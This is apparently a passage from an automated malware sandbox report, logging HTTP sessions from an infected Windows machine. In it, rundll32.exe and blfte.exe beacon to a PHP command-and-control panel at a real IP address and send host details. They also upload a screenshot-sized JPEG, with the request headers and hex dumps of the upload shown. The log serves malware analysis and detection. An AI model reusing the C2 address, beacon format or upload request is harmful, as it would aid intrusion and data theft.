                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          304192.168.2.449932176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.553277016 CEST10199OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          305176.111.174.11480192.168.2.449932C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.652452946 CEST10200INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          306192.168.2.449933176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.751935959 CEST10213OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:59.846266031 CEST10216OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:59.846446037 CEST10219OUTData Raw: a9 4b 76 b5 94 15 3e 9b 28 c5 7b b6 d6 2f 67 d0 fa 03 51 bf fd 90 bf 6a ef 86 7f 0c b4 ff 00 1b fe d0 f6 df 08 ff 00 e1 56 58 ea 1e 1c bd d1 3c 49 a0 6a fa a4 fa 9f 87 df 58 bc d4 ed 27 d3 0d 8d b5 c4 4f 7c a9 7d 71 04 90 dd cb 69 11 78 a0 61 3e
                                                                                                                                          Data Ascii: Kv>({/gQjVX<IjX'O|}qixa>$|y=|K^>a?i={i6A&4e"$x;[u|Dz58AYRUwvvJ8.JJ2m]KO_Oe'tc
                                                                                                                                          Apr 28, 2021 22:59:59.846791029 CEST10221OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:59.847323895 CEST10224OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:59.847718954 CEST10227OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:59.847845078 CEST10230OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 22:59:59.848206043 CEST10232OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:59.848464966 CEST10235OUTData Raw: 71 ff 00 09 d7 8d cf fd c9 13 7f f1 75 fc de 78 6b e1 1f c5 8f 18 fc 4d 1f 05 3c 1f f0 ab c4 9a af 8c cd fc f6 23 c2 3a 66 85 71 3e a8 6e a1 df e7 41 f6 44 43 37 98 9b 1f 72 6d dc bb 1b 20 60 d7 5f a0 7e c4 3f b6 af 8c 3c 6b af 7c 33 f0 97 ec 75
                                                                                                                                          Data Ascii: quxkM<#:fq>nADC7rm `_~?<k|3u[T'~?:?j 2[F@/`1UZ-jCcq:n!}uz7r~o:3>6x?823_:[oAIzm"I4bCE
                                                                                                                                          Apr 28, 2021 22:59:59.848814964 CEST10238OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:59.848977089 CEST10240OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          307192.168.2.449934176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.861910105 CEST10241OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          308176.111.174.11480192.168.2.449934C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:59.962116957 CEST10295INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          309192.168.2.449935176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.175297022 CEST10430OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          31176.111.174.11480192.168.2.449763C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:14.636604071 CEST4536INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:14 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          310176.111.174.11480192.168.2.449933C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.227772951 CEST10430INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:59 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          311176.111.174.11480192.168.2.449935C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.273334980 CEST10431INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 21:00:00 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          312192.168.2.449937176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 23:00:00.487629890 CEST10432OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
